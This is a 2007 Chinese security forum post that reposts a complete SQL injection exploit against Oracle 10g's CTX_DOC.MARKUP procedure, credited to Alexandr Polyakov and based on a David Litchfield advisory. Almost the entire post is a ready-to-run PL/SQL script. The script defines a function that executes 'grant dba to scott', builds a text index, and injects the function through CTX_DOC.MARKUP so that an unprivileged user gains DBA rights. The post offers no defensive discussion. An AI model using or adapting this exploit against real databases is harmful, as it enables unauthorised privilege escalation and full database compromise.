‹‹ 上一主题 | 下一主题 ››
发新话题
打印

Oracle 10g CTX_DOC.MARKUP SQL Injection Exploit

ring04h

团队执行官

Rank: 8Rank: 8

E.S.T核心成员 社区主管

帖子
3910 
精华
128 
积分
209604 
阅读权限
200 
性别
男 
在线时间
1058 小时 
注册时间
2007-10-23 
最后登录
2008-5-13 

资料收集奖 运营支持奖

楼主 发表于 2007-10-29 15:08  只看该作者

Oracle 10g CTX_DOC.MARKUP SQL Injection Exploit

复制内容到剪贴板
代码:
/******************************************************************/
/******* Oracle 10g CTX_DOC.MARKUP SQL Injection Exploit **********/
/******************************************************************/
/************ sploit grant DBA to unprivileged user ***************/
/******************************************************************/
/****************** BY Sh2kerR (Digital Security) ***************/
/******************************************************************/
/***************** tested on oracle 10.1.0.2.0 *******************/
/******************************************************************/
/******************************************************************/
/*     Date of Public EXPLOIT: October 23, 2007       */
/*     Written by:       Alexandr "Sh2kerr" Polyakov  */
/*     email:          [email]Alexandr.Polyakov@dsec.ru[/email]   */
/*     site:          [url]http://www.dsec.ru[/url]      */
/******************************************************************/
/* Original Advisory by:                     */
/*    David Litchfield [ [email]davidl@ngssoftware.com[/email] ]       */
/*    Reported: 6 June 2005                  */
/*    Date of Public Advisory: October 17, 2007        */
/*    Advisory number: #NISR17102007A             */
/*                                */
/******************************************************************/

select * from user_role_privs;


CREATE OR REPLACE FUNCTION HACKIT return varchar2
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'grant dba to scott';
COMMIT;
RETURN '';
END;
/


set serveroutput on

create table mark_tab (id number primary key, text varchar2(80) );

insert into mark_tab values ('1', 'All your bases are belong to US');

create index mark_tab_idx on mark_tab(text)
    indextype is ctxsys.context parameters
    ('filter ctxsys.null_filter');


SET SERVEROUTPUT ON;
DECLARE
   mklob CLOB;
   amt NUMBER := 40;
   line VARCHAR2(80);
   BEGIN
    CTX_DOC.MARKUP('mark_tab_idx','1',''||scott.HACKIT()||'', mklob);
    DBMS_LOB.READ(mklob, amt, 1, line);
    DBMS_OUTPUT.PUT_LINE('QWRvcmUuVS5NeS5TdGFy'||line);
    DBMS_LOB.FREETEMPORARY(mklob);
    END;
   /


select * from user_role_privs;

/******************************************************************/
/*************************** SEE U LATER ;) ***********************/
/******************************************************************/
...退出这个无聊的娱乐圈!

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题